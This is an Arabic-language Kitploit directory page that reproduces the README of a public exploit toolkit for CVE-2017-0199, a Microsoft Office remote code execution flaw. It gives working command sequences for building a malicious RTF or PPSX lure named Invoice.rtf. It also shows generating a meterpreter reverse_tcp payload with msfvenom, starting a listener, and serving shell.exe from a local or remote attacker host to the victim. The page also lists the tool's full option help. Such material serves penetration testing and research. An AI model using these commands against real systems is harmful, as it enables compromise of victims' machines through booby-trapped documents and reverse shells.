Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-0199 — مجموعة أدوات استغلال الثغرة CVE-2017-0199 - الإصدار 4.0 هي سكريبت بايثون مفيد يوفر لمختبرِي الاختراق والباحثين في الأمن طريقة سريعة وفعالة لاختبار ثغرة تنفيذ الأوامر عن بُعد (RCE) في Microsoft Office. تستطيع إنشاء ملف RTF/PPSX ضار وتسليم حمولة metasploit / meterpreter / غيرها إلى الضحية دون أي تكوين معقد. | Kitploit
أدوات/GitHubGitHub/bhdresh/cve-2017-0199
توليد الحمولةالاستغلالاستغلال تطبيقات الويبتحليل البرمجيات الخبيثةاختبار الاختراقالتعلم والتعليم
GitHubbhdresh/cve-2017-0199

CVE-2017-0199

عرض المستودع
72425614منذ 8 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

مجموعة أدوات استغلال الثغرة CVE-2017-0199 - الإصدار 4.0 هي سكريبت بايثون مفيد يوفر لمختبرِي الاختراق والباحثين في الأمن طريقة سريعة وفعالة لاختبار ثغرة تنفيذ الأوامر عن بُعد (RCE) في Microsoft Office. تستطيع إنشاء ملف RTF/PPSX ضار وتسليم حمولة metasploit / meterpreter / غيرها إلى الضحية دون أي تكوين معقد.

مشاركة

أداة الاستغلال CVE-2017-0199 - v4.0

أداة الاستغلال CVE-2017-0199 - v4.0 هي سكريبت بايثون مفيد يوفر لمختبر الاختراق والباحثين الأمنيين طريقة سريعة وفعالة لاختبار تنفيذ الأوامر عن بعد (RCE) في Microsoft Office. يمكنها إنشاء ملف RTF/PPSX خبيث وتوصيل حمولة metasploit / meterpreter / غيرها إلى الضحية دون أي إعدادات معقدة.

إخلاء مسؤولية

هذا البرنامج لأغراض تعليمية فقط. لا تستخدمه دون إذن. ينطبق إخلاء المسؤولية المعتاد، خاصة أنني (bhdresh) غير مسؤول عن أي أضرار ناتجة عن الاستخدام المباشر أو غير المباشر للمعلومات أو الوظائف التي توفرها هذه البرامج. لا يتحمل المؤلف أو أي مزود إنترنت أي مسؤولية عن المحتوى أو سوء استخدام هذه البرامج أو أي مشتقات منها. باستخدام هذا البرنامج فإنك تقبل حقيقة أن أي ضرر (فقدان بيانات، تعطل النظام، اختراق النظام، إلخ) ناتج عن استخدام هذه البرامج ليس مسؤولية bhdresh.

أخيرًا، هذا تطوير شخصي، يرجى احترام فلسفته وعدم استخدامه لأشياء سيئة!

الترخيص

CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/

ملاحظة الإصدار:

تم إدخال الإمكانيات التالية إلى السكريبت:

root@kitploit:~
- إنشاء ملف PPSX خبيث
- وضع الاستغلال لملف PPSX المُنشأ
- تحديث template.ppsx

الإصدار: Python version 2.7.13

السيناريو 1: توصيل حمولة محلية

أوامر مثال
root@kitploit:~
1) إنشاء ملف RTF خبيث
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) (اختياري، إذا كنت تستخدم حمولة MSF) : إنشاء حمولة metasploit وبدء المعالج
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) تشغيل الأداة في وضع الاستغلال لتوصيل حمولة محلية
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
مخطط التسلسل

alt tag

السيناريو 2: توصيل حمولة عن بُعد

أوامر مثال
root@kitploit:~
1) إنشاء ملف RTF خبيث
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) تشغيل الأداة في وضع الاستغلال لتوصيل حمولة عن بُعد
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe
مخطط التسلسل

alt tag

السيناريو 3: توصيل ملف HTA مخصص

أوامر مثال
root@kitploit:~
1) إنشاء ملف RTF خبيث
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) تشغيل الأداة في وضع الاستغلال لتوصيل ملف HTA مخصص
   # python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta
مخطط التسلسل

alt tag

وسائط سطر الأوامر:

root@kitploit:~
# python cve-2017-0199_toolkit.py -h

هذه أداة مفيدة لاستغلال ثغرة CVE-2017-0199 (تنفيذ الأوامر في Microsoft Office)

الأنماط:

-M gen                                          إنشاء ملف خبيث فقط

     إنشاء ملف RTF/PPSX خبيث:

      -w <Filename.rtf/Filename.ppsx>     اسم ملف RTF/PPSX الخبيث (شارك هذا الملف مع الضحية).

      -u <http://attacker.com/test.hta>   المسار إلى ملف HTA/SCT. عادةً، يجب أن يكون هذا نطاقًا أو عنوان IP حيث تعمل هذه الأداة. على سبيل المثال، http://attackerip.com/test.doc (سيتم تضمين عنوان URL هذا في ملف RTF/PPSX الخبيث وسيتم طلبه بمجرد أن يفتح الضحية ملف RTF الخبيث).
      -t RTF|PPSX (الافتراضي = RTF)         نوع الملف المراد إنشاؤه.
      -x 0|1  (الافتراضي = 0)               إنشاء ملف RTF مشوّه. 0 = تعطيل، 1 = تفعيل.

				      
-M exp                                          بدء وضع الاستغلال

     الاستغلال:
 
      -t RTF|PPSX (الافتراضي = RTF)         نوع الملف المراد استغلاله.
      -H </tmp/custom>                المسار المحلي لملف HTA/SCT مخصص يحتاج إلى التوصيل والتنفيذ على الهدف.
                                          ملاحظة: هذا الخيار لن يوصل الحمولات المحددة من خلال الخيارين "-e" و "-l"
					  
      -p <منفذ TCP: الافتراضي 80>            رقم المنفذ المحلي.

      -e <http://attacker.com/shell.exe>  مسار ملف تنفيذي / شيل meterpreter / حمولة تحتاج إلى التنفيذ على الهدف.

      -l </tmp/shell.exe>                 إذا كانت الحمولة مستضافة محليًا، حدد المسار المحلي لملف تنفيذي / شيل meterpreter / حمولة.

الإشادة

@nixawk لعينة RTF، @Li Haifei، @bhdresh

أخطاء، مشاكل، طلبات ميزات

من الواضح أنني لست مطورًا بدوام كامل، لذا توقع بعض المشاكل يرجى الإبلاغ عن الأخطاء والمشاكل عبر https://github.com/bhdresh/CVE-2017-0199/issues/new

تنزيل الأداة